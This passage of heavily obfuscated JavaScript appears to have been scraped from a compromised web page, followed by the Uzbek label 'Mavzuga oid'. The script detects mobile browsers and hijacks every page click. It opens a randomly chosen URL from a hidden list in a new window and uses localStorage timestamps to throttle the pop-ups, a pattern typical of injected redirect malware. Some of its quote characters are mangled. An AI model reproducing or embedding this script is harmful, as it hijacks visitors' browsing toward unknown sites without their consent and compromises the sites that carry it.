_0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid